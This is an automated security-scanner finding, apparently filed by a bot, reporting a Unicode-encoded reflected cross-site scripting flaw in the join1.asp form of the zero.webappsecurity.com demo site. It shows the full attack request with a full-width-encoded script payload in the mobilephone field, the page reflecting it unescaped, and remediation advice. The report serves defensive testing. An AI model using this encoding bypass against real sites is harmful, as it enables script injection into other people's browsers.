Cross-Site Scripting: Reflected - http://zero.webappsecurity.com:80/join1.asp?Name=%u0031%u0032%u0033%u0034%u0035&Surname=%u0031%u0032%u0033%u0034%u0035&email=%u004A%u006F%u0068%u006E%u002E%u0044%u006F%u0065%u0025%u0034%u0030%u0073%u006F%u006D%u0065%
Created by: armorcodegithubpreprod[bot]
Category: Cross-Site Scripting: Reflected
Instance Id: b56113e9-172c-4690-904f-a0efa1d5c347
Vulnerability Id: 0c94d187-1e6e-46cd-b28e-4512ebd9e7cd
Scan Type: Dynamic
CheckType: Vulnerability
Abstract: A Unicode conversion Cross-Site Scripting (XSS) vulnerability was found. This vulnerability is due to an input validation error in the filtration of special HTML characters supplied as Unicode characters. If exploited, an attacker could craft a malicious link containing arbitrary HTML or script code to be executed in a user's browser. Recommendations include modifying the web.config file to use only the Unicode code page for output, or filtering full-width ASCII characters from all non-trusted data sources.
Request:
GET /join1.asp?Name=%u0031%u0032%u0033%u0034%u0035&Surname=%u0031%u0032%u0033%u0034%u0035&email=%u004A%u006F%u0068%u006E%u002E%u0044%u006F%u0065%u0025%u0034%u0030%u0073%u006F%u006D%u0065%u0077%u0068%u0065%u0072%u0065%u002E%u0063%u006F%u006D&Password=%u0031%u0032%u0033%u0034%u0035&Confirm%20Password=%u0031%u0032%u0033%u0034%u0035&house=%u0031%u0032%u0033%u0034%u0035&street=%u0031%u0032%u0033%u0034%u0035&Address2=%u0031%u0032%u0033%u0034%u0035&town=%u0031%u0032%u0033%u0034%u0035&Postcode=%u0031%u0032%u0033%u0034%u0035&Country=%u0031%u0032%u0033%u0034%u0035&homephone=%u0037%u0037%u0030&mobilephone=%uFF1C%u0073%u0063%u0072%u0069%u0070%u0074%uFF1E%u0061%u006C%u0065%u0072%u0074%u0028%u0027%u0076%u0075%u006C%u006E%u0065%u0072%u0061%u0062%u0069%u006C%u0069%u0074%u0079%u0027%u0029%uFF1C%u002F%u0073%u0063%u0072%u0069%u0070%u0074%uFF1E HTTP/1.1
Referer: http://zero.webappsecurity.com:80/join.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: */*
Pragma: no-cache
Host: zero.webappsecurity.com
X-Scan-Memo: Category="Audit"; Function="createStateRequestFromAttackDefinition"; SID="21B879FA8CFD3E4B1175B97AD24EF2DA"; PSID="FAC63941855F0BDFDBEE807AB600B431"; SessionType="AuditAttack"; CrawlType="None"; AttackType="QueryParamManipulation"; OriginatingEngineID="e1b90d8a-7c62-4157-8be9-6c95d3c5f185"; AttackSequence="0"; AttackParamDesc="mobilephone"; AttackParamIndex="12"; AttackParamSubIndex="0"; CheckId="5172"; Engine="Asp+Net+Unicode+XSS"; Retry="False"; SmartMode="ServerSpecificOnly"; AttackString="%25uff1cscript%25uff1ealert('vulnerability')%25uff1c%2fscript%25uff1e"; ThreadId="25"; ThreadType="AuditDBReaderSessionDrivenAudit";
Connection: Keep-Alive
Cookie: CustomCookie=WebInspect69383ZXB3FCEA2CCD6849B0A63D3EFF65615601Y3637;status=yes;username=;userid=;sessionid=;ASPSESSIONIDCARBTACT=NPEJMBECCJLDPDPFJFLLKNOJ;state=;passes3=;passes=;passes2=;Keyed=Var2=Second+Value&Var1=First+Value;Second=Oatmal+Chocolate;FirstCookie=Chocolate+Chip
Response:
Date: Fri, 13 May 2011 19:54:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 4089
Content-Type: text/html
Set-Cookie: passes=; path=/
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Cache-control: private
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please supply a real e-mail address</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="John.Doe@somewhere.com"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE="12345"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="770"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE="<script>alert('vulnerability')</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
File Path: //zero.webappsecurity.com:0
Mitigation:
For Security Operations:
No patch is currently available.
Modify the web.config file to use only the Unicode code page for output. To do this, add the following lines to your web.config file:
<configuration>
<system.web>
<globalization responseEncoding="utf-8" />
</system.web>
</configuration>
If you cannot use Unicode, have your developers filter full-width ASCII characters from all non-trusted data sources, such as user input, HTTP headers, the output of some components, and other data.
For Developers:
Have your Security Operations team modify the web.config file to use only the Unicode code page for output.
If your application cannot use Unicode, you must filter full-width ASCII characters from all non-trusted data sources, such as user input, HTTP headers, some components output, and other data.
For QA:
For security reasons, it is important to test the web application not only from the perspective of a normal user, but also from that of a malicious one. Whenever possible, adopt the mindset of an attacker when testing your web application for security defects.
Attempt to craft a link using Unicode characters and containing arbitrary HTML or script code to be executed in a user's browser. If the application does not properly validate the Unicode characters, report your findings to your Security Operations and Developers.